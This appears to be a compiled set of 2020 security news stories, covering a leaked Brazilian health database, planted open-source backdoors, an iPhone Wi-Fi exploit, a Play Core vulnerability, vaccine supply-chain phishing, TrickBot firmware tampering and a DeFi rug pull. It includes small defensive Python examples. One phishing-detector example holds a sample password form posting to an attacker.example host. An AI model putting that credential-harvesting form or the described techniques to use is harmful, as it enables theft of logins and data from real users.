More stories


    Data of 243 million Brazilians exposed online via website source code

    Image: Mateus Campos Felipe
    The personal information of more than 243 million Brazilians, including alive and deceased, has been exposed online after web developers left the password for a crucial government database inside the source code of an official Brazilian Ministry of Health’s website for at least six months.

The security snafu was discovered by reporters from Brazilian newspaper Estadao, the same newspaper that last week discovered that a Sao Paulo hospital leaked personal and health information for more than 16 million Brazilian COVID-19 patients after an employee uploaded to GitHub a spreadsheet containing usernames, passwords, and access keys for sensitive government systems.
    Estadao reporters said they were inspired by a report filed in June by Brazilian NGO Open Knowledge Brasil (OKBR), which, at the time, reported that a similar government website also left exposed login information for another government database in the site’s source code.
    Since a website’s source code can be accessed and reviewed by anyone pressing F12 inside their browser, Estadao reporters searched for similar issues in other government sites.
    They found a similar leak in the source code of e-SUS-Notifica, a web portal where Brazilian citizens can sign up and receive official government notifications about the COVID-19 pandemic.
Reporters said the site’s source code contained a username and password stored in Base64, an encoding format that can be reversed to recover the original username and password with little to no effort.
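As a minimal illustration of why Base64 offers no protection (using an obviously made-up credential, not the leaked one), reversing the encoding takes a single standard-library call in Python:

```python
import base64

# Illustrative only: a "username:password" string encoded the way credentials might appear in page source.
encoded = base64.b64encode(b"example_user:example_password").decode()
print(encoded)                              # the opaque-looking string a visitor would see in the HTML/JS
print(base64.b64decode(encoded).decode())   # example_user:example_password -- no key or secret required
```

Base64 is an encoding, not encryption; anything shipped to the browser in this form should be treated as public.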
The login information allowed access to SUS (Sistema Único de Saúde), the official database of the Brazilian Ministry of Health, which stored information on all Brazilians who signed up for the country’s publicly funded health care system, established in 1989.

The database contained all the personal information a Brazilian provided to the government, from full names to home addresses, and from phone numbers to medical details.
    The credentials have now been removed from the site’s source code, but it remains unclear if anyone has accessed the system and pilfered data on Brazilian citizens.
If unauthorized access were discovered, it would be the largest security breach in the country’s history.


    Open-source: Almost one in five bugs are planted for malicious purposes

    Microsoft-owned GitHub, the world’s largest platform for open-source software, has found that 17% of all vulnerabilities in software were planted for malicious purposes. 
In its 2020 Octoverse report, released yesterday, GitHub reported that almost a fifth of all software bugs were intentionally placed in code by malicious actors. 


    Proprietary software makers over the years have been regularly criticized for ‘security through obscurity’ or not making source code available for review by experts outside the company. Open source, on the other hand, is seen as a more transparent manner of development because, in theory, it can be vetted by anyone. 
    SEE: Security Awareness and Training policy (TechRepublic Premium)    
    But the reality is that it’s often not vetted due to a lack of funding and human resource constraints. 
    A good example of the potential impact of bugs in open source is Heartbleed, the bug in OpenSSL that a Google researcher revealed in 2014, which put a spotlight on how poorly funded many open-source software projects are. 
    Affecting a core piece of internet infrastructure, Heartbleed prompted Amazon, IBM, Intel, Microsoft, Cisco and VMware to pour cash into The Linux Foundation to form the Core Infrastructure Initiative (CII).

For the past few years, GitHub has been investing heavily in tools to help open-source projects remediate security flaws, such as its Dependency Graph, which works together with its Security Alerts feature. 
    The security alerts service scans software dependencies (software libraries) used in open-source projects and automatically alerts project owners if it detects known vulnerabilities. The service supports projects written in Java, JavaScript, .NET, Python, Ruby and PHP. 
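Conceptually, that kind of dependency scanning boils down to matching a project’s pinned packages against an advisory database. The sketch below is a toy model of the idea rather than GitHub’s implementation, and the advisory entries are illustrative placeholders:

```python
# Toy advisory data; a real scanner pulls from curated vulnerability databases.
ADVISORIES = {
    ("lodash", "4.17.15"): "example advisory: prototype pollution",
    ("minimist", "1.2.0"): "example advisory: prototype pollution",
}

def scan_dependencies(dependencies):
    """Return an alert for every dependency pinned to a version with a known advisory."""
    alerts = []
    for name, version in dependencies.items():
        advisory = ADVISORIES.get((name, version))
        if advisory:
            alerts.append(f"{name}@{version}: {advisory}")
    return alerts

print(scan_dependencies({"lodash": "4.17.15", "react": "17.0.1"}))
# ['lodash@4.17.15: example advisory: prototype pollution']
```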
GitHub’s 2020 Octoverse report found that the ecosystems making the most frequent use of open-source dependencies were JavaScript (94%), Ruby (90%), and .NET (90%). 
    While almost a fifth of vulnerabilities in open-source software were intentionally planted backdoors, GitHub highlights that most vulnerabilities were just plain old errors. 
    “These malicious vulnerabilities were generally in seldom-used packages, but triggered just 0.2% of alerts. While malicious attacks are more likely to get attention in security circles, most vulnerabilities are caused by mistakes,” GitHub notes. 
    As ZDNet’s Charlie Osborne reported, vulnerabilities in open-source projects remain undetected for four years on average before they’re revealed to the public. Then it takes about a month to issue a patch, according to GitHub. In other words, there’s still room for improvement despite GitHub’s efforts to automate bug fixing in open-source projects. 
GitHub notes in its report that the “vast majority” of the intentional backdoors come from the npm ecosystem. ZDNet’s Catalin Cimpanu reported this week that the npm security team had to remove a malicious JavaScript library from the npm website that contained malware for opening backdoors on programmers’ computers. Using this venue to distribute malware to developers makes sense given that JavaScript is the most popular programming language on GitHub.
    SEE: Google: Here’s how much we give to open source through our GitHub activity
    GitHub notes that only 0.2% of its security alerts were related to explicitly malicious activity.
“A big part of the challenge of maintaining trust in open source is assuring downstream consumers of code integrity and continuity in an ecosystem where volunteer commit access is the norm,” GitHub explains. 
“This requires better understanding of a project’s contribution graph, consistent peer review, commit and release signing, and enforced account security through multi-factor authentication (MFA).” 
GitHub notes that flaws can include ‘backdoors’, vulnerabilities intentionally planted in software to facilitate exploitation, and ‘bugdoors’, a specific type of backdoor that takes the form of a conveniently exploitable but hard-to-spot bug, rather than introducing explicitly malicious behavior.
The most blatant indicator of a backdoor is an attacker gaining commit access to a package’s source-code repository, usually via an account hijack, such as 2018’s ESLint attack, which used a compromised package to steal a user’s credentials for the npm package registry, GitHub said.
    The last line of defense against these backdoor attempts is careful peer review in the development pipeline, especially of changes from new committers. Many mature projects have this careful peer review in place. Attackers are aware of that, so they often attempt to subvert the software outside of version control at its distribution points, or by tricking people into grabbing malicious versions of the code through, for example, typosquatting a package name.
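One simple heuristic that can help catch typosquatting is flagging new package names that are very close, but not identical, to popular ones. A minimal sketch, assuming a short hypothetical allowlist of popular names:

```python
import difflib

# Hypothetical allowlist; a real check would use registry popularity data.
POPULAR_PACKAGES = ["express", "lodash", "request", "react", "electron"]

def possible_typosquats(name):
    """Return popular packages the given name closely resembles without matching exactly."""
    matches = difflib.get_close_matches(name, POPULAR_PACKAGES, n=3, cutoff=0.8)
    return [m for m in matches if m != name]

print(possible_typosquats("expres"))    # ['express'] -> suspiciously close, worth a closer look
print(possible_typosquats("express"))   # [] -> exact match, not a typosquat
```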


    Google researcher: I made this 'magic' iPhone Wi-Fi hack in my bedroom, imagine what others could do

    A Google Project Zero (GPZ) bug hunter who specializes in iPhone security has revealed a nasty bug in iOS that allowed an attacker within Wi-Fi range to gain “complete control” of an Apple phone. 
GPZ is a security research group within Google tasked with finding vulnerabilities in popular software, from Microsoft’s Windows 10 to Google Chrome and Android, as well as Apple’s iOS and macOS.  

    Ian Beer, a GPZ hacker who specializes in iOS hacks, says the vulnerability he found during the first COVID-19 lockdown this year allowed an attacker within Wi-Fi range to view all an iPhone’s photos and emails, and copy all private messages from Messages, WhatsApp, Signal and so on in real time. 
    SEE: Managing and troubleshooting Android devices checklist (TechRepublic Premium)
    “For 6 months of 2020, while locked down in the corner of my bedroom surrounded by my lovely, screaming children, I’ve been working on a magic spell of my own…a wormable radio-proximity exploit which allows me to gain complete control over any iPhone in my vicinity,” he writes.
Apple fixed the bug ahead of the launch of Privacy-Preserving Contact Tracing, which arrived in iOS 13.5 in May. 
    Beer, who regularly finds critical flaws in iOS and macOS, is using his bug to stress to iPhone owners that they may have a false sense of security when it comes to thinking about adversaries. 

    “The takeaway from this project should not be: no one will spend six months of their life just to hack my phone, I’m fine,” notes Beer. 
    “Instead, it should be: one person, working alone in their bedroom, was able to build a capability which would allow them to seriously compromise iPhone users they’d come into close contact with.”
    The contact-tracing connection Beer highlights is important because the bug he found was in an iOS feature called AWDL or Apple Wireless Direct Link – a proprietary Apple peer-to-peer networking protocol used for features like Apple AirPlay and the iOS-to-macOS file-sharing feature AirDrop. 
    AWDL is used in all Apple iOS and macOS devices. Researchers last year found serious flaws in the protocol that allowed an attacker on a network to intercept and change files being sent over AirDrop. The most concerning part of that batch of AWDL flaws was that they allowed an attacker to track an iPhone user’s location with a high degree of accuracy. Apple fixed those AWDL bugs last May in iOS 12.3, tvOS 12.3, watchOS 5.2.1, and macOS 10.14.5.
    The details of the flaw itself are important, but Beer is using his exploit to make a bigger point about the economics of software exploits. 
    As Beer notes, there are professional exploit brokers that sell iOS exploits to governments. 
    “Unpatched vulnerabilities aren’t like physical territory, occupied by only one side. Everyone can exploit an unpatched vulnerability,” notes Beer. 
    “It’s important to emphasize … that the teams and companies supplying the global trade in cyberweapons like this one aren’t typically just individuals working alone,” he continues. 
    “They’re well-resourced and focused teams of collaborating experts, each with their own specialization. They aren’t starting with absolutely no clue how bluetooth or wifi work. They also potentially have access to information and hardware I simply don’t have, like development devices, special cables, leaked source code, symbols files and so on.”
    SEE: 10 tech predictions that could mean huge changes ahead
The AWDL bug itself falls into the common category of memory-safety flaws; Beer describes it as a “fairly trivial buffer overflow” caused by programming errors Apple developers made in C++ code in Apple’s XNU (X is Not Unix) kernel. Microsoft and Google have found that memory vulnerabilities make up the vast majority of flaws in software. 
    In this case, Beer didn’t need a series of vulnerabilities in iOS to take control of a vulnerable iPhone, unlike the three iOS bugs Apple patched in iOS 14.2 last month. In other words, the one Beer found is highly valuable because of its relative simplicity to use. 
“This entire exploit uses just a single memory corruption vulnerability to compromise the flagship iPhone 11 Pro device. With just this one issue I was able to defeat all the mitigations in order to remotely gain native code execution and kernel memory read and write,” he writes.


    Google Authenticator for iOS gets a much-needed feature

    I dumped Google Authenticator a while ago. Sure, it’s the granddaddy of two-factor authentication apps, but it’s old and has some severe downsides.
The biggest downside was that you couldn’t transfer accounts between devices. It was a case of blitz everything and start again. I’ve come across a lot of people who entered the tarpits when this happened.
    But finally, as 2020 draws to a close, this feature comes to iOS and iPadOS.
    Must read: Paying money to make Google Chrome faster and use less RAM
Earlier this year, Google Authenticator for Android received a revamp that added dark mode and the ability to transfer accounts between devices. It works pretty well, but it wasn’t much use to you if you were an iOS user.

    The newly-released version 3.1.0 is the first refresh the iOS app has had in over two years, and adds the following:
–   Added the ability to transfer accounts to a different device, e.g. when switching phones
    –   Refreshed the look and feel of the app
    –   Dark Mode support
Personally, I moved over to Authy and have had no problems. This app is more feature-rich, and also works on Windows, Mac, and even Linux (along with, of course, iOS and Android). However, for those still using Google Authenticator on iPhones and iPads, this will be a welcome update.
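For context on what is actually being moved when accounts are transferred: each account in an authenticator app is a shared secret, and the six-digit codes are derived from that secret and the current time using the standard TOTP algorithm (RFC 6238). A minimal sketch, with a made-up Base32 secret:

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, period=30, digits=6):
    """Standard RFC 6238 TOTP: HMAC-SHA1 over the current 30-second time step."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = struct.pack(">Q", int(time.time() // period))
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                                    # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # made-up secret; prints a six-digit, time-based code
```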


    8% of all Google Play apps vulnerable to old security bug

    Image: Check Point
    Around 8% of Android apps available on the official Google Play Store are vulnerable to a security flaw in a popular Android library, according to a scan performed this fall by security firm Check Point.
    The security flaw resides in older versions of Play Core, a Java library provided by Google that developers can embed inside their apps to interact with the official Play Store portal.
The Play Core library is very popular, as app developers can use it to download and install updates, modules, language packs, or even other apps hosted on the Play Store.
    Earlier this year, security researchers from Oversecured discovered a major vulnerability (CVE-2020-8913) in the Play Core library that a malicious app installed on a user’s device could have abused to inject rogue code inside other apps and steal sensitive data — such as passwords, photos, 2FA codes, and more.
Check Point has published a video demo of such an attack.
    Google patched the bug in Play Core 1.7.2, released in March, but according to new findings published today by Check Point, not all developers have updated the Play Core library that ships with their apps, leaving their users exposed to easy data pilfering attacks from rogue apps installed on their devices.
    According to a scan performed by Check Point in September, six months after a Play Core patch was made available, 13% of all the Play Store apps were still using this library, but only 5% were using an updated (safe) version, with the rest leaving users exposed to attacks.

    Apps that did their duty to users and updated the library included Facebook, Instagram, Snapchat, WhatsApp, and Chrome; however, many other apps did not.
    Among the apps with the largest userbases that failed to update, Check Point listed the likes of Microsoft Edge, Grindr, OKCupid, Cisco Teams, Viber, and Booking.com.

    Image: Check Point
    Check Point researchers Aviran Hazum and Jonathan Shimonovich said they notified all the apps they found vulnerable to attacks via CVE-2020-8913, but, three months later, only Viber and Booking.com bothered to patch their apps after their notification.
    “As our demo video shows, this vulnerability is extremely easy to exploit,” the two researchers said.
    “All you need to do is to create a ‘hello world’ application that calls the exported intent in the vulnerable app to push a file into the verified files folder with the file-traversal path. Then sit back and watch the magic happen.”
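The “file-traversal path” mentioned in the quote refers to a classic pattern: a relative path containing “../” segments escapes the directory an app believes it is writing into. A minimal Python sketch of the check a safe implementation needs (the directory name is hypothetical, not Play Core’s actual layout):

```python
from pathlib import Path

VERIFIED_DIR = Path("/data/app/verified_files")  # hypothetical target folder

def is_safe_destination(requested_name):
    """Reject any requested file name whose resolved path escapes the intended folder."""
    candidate = (VERIFIED_DIR / requested_name).resolve()
    return VERIFIED_DIR.resolve() in candidate.parents

print(is_safe_destination("update_module.apk"))         # True: stays inside verified_files
print(is_safe_destination("../../files/payload.dex"))   # False: '../' segments escape the folder
```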
This research shows, once again, that while users may be using an up-to-date version of their apps, that doesn’t necessarily mean all of an app’s inner components are up-to-date as well, with software supply chains often being in complete disarray, even at some of the world’s biggest software/tech firms.


    Mysterious phishing campaign targets organizations in COVID-19 vaccine cold chain

    IBM’s cyber-security division says that hackers are targeting companies associated with the storage and transportation of COVID-19 vaccines using temperature-controlled environments — also known as the COVID-19 vaccine cold chain.

    The attacks consisted of spear-phishing emails seeking to collect credentials for a target’s internal email and applications.
    While IBM X-Force analysts weren’t able to link the attacks to a particular threat actor, they said the phishing campaign showed the typical “hallmarks of nation-state tradecraft.”
    Government agencies and private companies targeted alike
    Targets of the attacks included a wide variety of companies, sectors, and government organizations. This included the European Commission’s Directorate-General for Taxation and Customs Union, an organization that monitors the movement of products across borders — including medical supplies.
    The attackers also targeted a company that manufactures solar panels used for solar-powered vaccine transport refrigerators and a petrochemical company that manufactures dry ice, also used for vaccine transportation.
    Further, the same threat actor also targeted a German IT company that makes websites for “pharmaceutical manufacturers, container transport, biotechnology and manufacturers of electrical components enabling sea, land and air navigation and communications.”
    Also: MIT machine learning models find gaps in coverage by Moderna, Pfizer, other Warp Speed COVID-19 vaccines 

According to IBM, the attackers specifically targeted select executives at each company, usually individuals in sales, procurement, IT, and finance positions, roles likely to be involved in company efforts to support a vaccine cold chain.
    The selected targets typically received emails using the spoofed identity of a business executive from Haier Biomedical, a Chinese company which is part of the UN’s official Cold Chain Equipment Optimization Platform (CCEOP) program.
“The subject of the phishing emails posed as requests for quotations (RFQ) related to the CCEOP program,” IBM researchers Melissa Frydrych and Claire Zaboeva said in a report today.

    Image: IBM
    The emails contained malicious HTML files as attachments that victims had to download and open locally. Once opened, the files prompted victims to enter various credentials to view the file.
    “This phishing technique helps attackers avoid setting up phishing pages online that can be discovered and taken down by security research teams and law enforcement.” 
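Because the credential prompt ships inside the attachment itself, one triage heuristic defenders can apply is flagging HTML attachments that embed a password-entry form. A toy sketch (the sample markup and domain are invented):

```python
import re

# Matches an <input> element whose type is "password", case-insensitively.
PASSWORD_FORM = re.compile(r"<input[^>]+type=[\"']?password", re.IGNORECASE)

def looks_like_credential_harvester(html_attachment):
    """Toy heuristic: flag HTML attachments that embed a password-entry form."""
    return bool(PASSWORD_FORM.search(html_attachment))

sample = '<form action="https://attacker.example/collect"><input type="password" name="pw"></form>'
print(looks_like_credential_harvester(sample))  # True -> worth quarantining for review
```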
    All in all, companies in Germany, Italy, South Korea, Czech Republic, greater Europe, and Taiwan were targeted in this campaign.
    COVID-19 companies repeatedly targeted in recent months 
But this phishing operation is just the latest in a long list of attacks by various threat actors that have targeted the COVID-19 vaccine research field this year.
    Previous targets included Johnson & Johnson, Novavax, Genexine, Shin Poong Pharmaceutical, Celltrion, according to the Wall Street Journal, and AstraZeneca and Gilead, according to Reuters.
    Some of the attacks have been linked back to the governments of China, Iran, Russia, and North Korea.
However, while the previous attacks targeted the vaccine makers directly, this particular campaign was different because it targeted their supply chain, suggesting threat actors are also looking for information on how to transport and store vaccines, not only how to make them.
    The US Federal Bureau of Investigation and the Cybersecurity and Infrastructure Security Agency are scheduled to release a security alert later today about the phishing campaign spotted by IBM.
The joint FBI and CISA alert comes after Interpol published a different security alert on Wednesday to warn that organized crime syndicates, active both in the real world and online, are likely to try to infiltrate and disrupt vaccine supply chains for their own financial profit.
Several pharmaceutical companies have announced this fall that they’ve developed successful COVID-19 vaccines, most of which are expected to enter broad distribution in early 2021 — if their supply chains don’t get disrupted.


    New TrickBot version can tamper with UEFI/BIOS firmware

    The operators of the TrickBot malware botnet have added a new capability that can allow them to interact with an infected computer’s BIOS or UEFI firmware.

    The new capability was spotted inside part of a new TrickBot module, first seen in the wild at the end of October, security firms Advanced Intelligence and Eclypsium said in a joint report published today.
    The new module has security researchers worried as its features would allow the TrickBot malware to establish more persistent footholds on infected systems, footholds that could allow the malware to survive OS reinstalls.
    In addition, AdvIntel and Eclypsium say the new module’s features could be used for more than just better persistence, such as:
–   Remotely bricking a device at the firmware level via a typical malware remote connection.
    –   Bypassing security controls such as BitLocker, ELAM, Windows 10 Virtual Secure Mode, Credential Guard, endpoint protection controls like A/V, EDR, etc.
    –   Setting up a follow-on attack that targets Intel CSME vulnerabilities, some of which require SPI flash access.
    –   Reversing ACM or microcode updates that patched CPU vulnerabilities like Spectre, MDS, etc.
    But the good news is that “thus far, the TrickBot module is only checking the SPI controller to check if BIOS write protection is enabled or not, and has not been seen modifying the firmware itself,” according to AdvIntel and Eclypsium.
    “However, the malware already contains code to read, write, and erase firmware,” the two companies added.
    Researchers say that even if the feature has not been deployed to its full extent just yet, the fact that the code is present inside TrickBot suggests its creators plan to use it in certain scenarios.

    Appropriate cases may include the networks of larger corporations where the TrickBot gang may not want to lose access and may want to leave behind a more powerful boot-level persistence mechanism.
    This module could also be used in ransomware attacks, in which the TrickBot gang is often involved by renting access to its network of bots to ransomware crews.

    Image: AdvIntel
    If companies who had their networks encrypted refuse to pay, the TrickBot module could be used to destroy their systems, AdvIntel and Eclypsium said.
The module could also be used to prevent incident responders from finding crucial forensic evidence by crippling a system’s ability to boot up.
“The possibilities are almost limitless,” AdvIntel and Eclypsium said, highlighting the many different areas in which TrickBot helps its customers operate.

    Image: AdvIntel
    Feature powered via publicly available code
The addition of this feature to the TrickBot code also marks the first time that UEFI/BIOS tampering capabilities have been seen in a common, financially motivated malware botnet.
Prior to today’s report, the only malware strains known to have the ability to tamper with UEFI or BIOS firmware were LoJax and MosaicRegressor.
    Both are malware strains developed by government-sponsored hacking groups — LoJax by Russian hackers and MosaicRegressor by Chinese hackers.
    But according to Eclypsium, a company specializing in firmware security, the TrickBot gang didn’t develop its code from scratch. Its analysis suggests the gang has instead adapted publicly available code into a specialized module they could install on infected systems via the first-stage TrickBot loader.
    “Specifically, TrickBot uses the RwDrv.sys driver from the popular RWEverything tool in order to interact with the SPI controller to check if the BIOS control register is unlocked and the contents of the BIOS region can be modified,” Eclypsium said.
    “RWEverything (read-write everything) is a powerful tool that can allow an attacker to write to the firmware on virtually any device component, including the SPI controller that governs the system UEFI/BIOS,” Eclypsium said. “This can allow an attacker to write malicious code to the system firmware, ensuring that attacker code executes before the operating system while also hiding the code outside of the system drives.”
    New feature added after failed takedown attempt
But the timing of this new TrickBot feature’s discovery is also worth noting. It comes as TrickBot is slowly coming back to life after a failed takedown attempt.
Over the past few weeks, TrickBot operations have seen a flurry of updates, ranging from new obfuscation techniques to new command-and-control infrastructure and new spam campaigns.

All of these updates are aimed at reviving and shoring up one of today’s largest cybercrime-as-a-service botnet operations, which, in its heyday, controlled more than 40,000 infected computers each day.
    Sherrod DeGrippo, Senior Director for Threat Research and Detection at Proofpoint, told ZDNet that Proofpoint “has not observed a significant change in the Trick volumes despite the disruptive activities by US Cyber Command and the Microsoft-led coalition.”
For now, TrickBot not only appears to have survived the takedown attempt, but is actually coming back to life with stronger features than before.
    “Every actor responds to changes in their operational environment differently,” DeGrippo added.
“[TrickBot] has demonstrated that its botnet is resilient to disruptive actions by governments and security vendors; however, it is not immune to future disruption. We anticipate a higher velocity of infrastructure changes and malware updates to occur in the near term.”


    Compounder Finance DeFi project allegedly pulls the rug from under investors, $11 million stolen

    An exit scam allegedly performed by Compounder Finance DeFi developers has left investors $11 million out of pocket. 

    Compounder Finance called itself a “smarter farming” platform and a Harvest/Yearn Finance clone, as first reported by CoinDesk. 
    At the time of writing, the project’s website, Twitter, Medium, and Discord pages appear to have been deleted. 
    According to a cached version of a Medium blog post describing the project, dated November 8, Compounder Finance claimed to be an automated farming system offering compound interest on digital assets while also earning native CP3R tokens as a “reward.”
    See also: Chainalysis launches program to manage cryptocurrency seized by law enforcement
    “We will examine yields, security and complexity of new pools that will keep our stakers comfortable knowing they have a competitive edge to other farmers. We hope to offer the next generation of high-interest returns,” the developers claimed. 
    Pools supported ETH, DAI, USDT, and USDC.

Compounder Finance, which launched only last month, promised investors that the Ethereum-based decentralized finance (DeFi) project implemented 24-hour time locks on all smart contracts in the interest of safety. What wasn’t known is that the developers had allegedly included a hidden backdoor in the system. 
In a ‘rug pull,’ otherwise known as the unexpected removal of liquidity from a token, roughly $10.8 million in wrapped Bitcoin (WBTC), ETH, DAI, and other tokens was transferred out of the project once the platform had secured enough funding from eager investors. 
DefiYield, a Twitter user who claims to have lost $1 million due to the rug pull, has offered a $100,000 reward for any information leading to the identity of the threat actor, or any means to return stolen funds to victims. 
    “As this is a substantial loss for me and many more crypto farmers, I will keep going on with the investigation and pushing the authorities now and in the coming years, until there will be a positive result,” the investor said. 
    CNET: Google researcher demonstrates iPhone exploit with Wi-Fi takeover
    A Telegram group has also been created for impacted investors to explore their legal options.
    Solidity Finance previously audited the project (.PDF) for external threat potential and flagged the suspicious time-locked smart contract setup, as well as the control maintained by the central development team. 
    Malicious strategy contracts were added after the audit, allowing the rug pull deployer to withdraw funds. 
    TechRepublic: Sales of CEO email accounts may give cyber criminals access to the “crown jewels” of a company
A post-mortem report on the rug pull, written together with @vasa_develop from Stake Capital, has now been published.
    “The Compounder team swapped the safe/audited Strategy contracts and replaced them with malicious ‘Evil Strategy’ contracts that allowed them to steal user funds,” Solidity Finance said. “They did this through a public, though clearly unmonitored, 24-hour timelock. The team had the power to update strategy pools and they did so maliciously here.”
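The mechanism Solidity Finance describes is worth unpacking: a timelock does not prevent a malicious change, it only makes the change publicly visible for a fixed window before it can take effect, so its value depends entirely on someone watching the queue. Below is a minimal, non-Solidity sketch of the general idea, not Compounder’s actual contracts:

```python
import time

DELAY_SECONDS = 24 * 60 * 60  # the 24-hour window during which a queued change is visible

class Timelock:
    """Toy model of a timelocked upgrade queue, for illustration only."""

    def __init__(self):
        self.queue = {}  # action id -> (description, earliest time it may execute)

    def propose(self, action_id, description):
        # Proposals become public immediately; execution must wait out the delay.
        self.queue[action_id] = (description, time.time() + DELAY_SECONDS)

    def pending(self):
        # Anyone monitoring the queue during the delay can see what is about to change.
        return dict(self.queue)

    def execute(self, action_id):
        description, eta = self.queue[action_id]
        if time.time() < eta:
            raise RuntimeError("timelock has not expired yet")
        del self.queue[action_id]
        return description
```

If nobody inspects the pending queue during those 24 hours, as appears to have happened here, the delay offers no real protection.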
    At the time of writing, the CP3R token is worth $0.34, down from $80.18 on November 25.
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0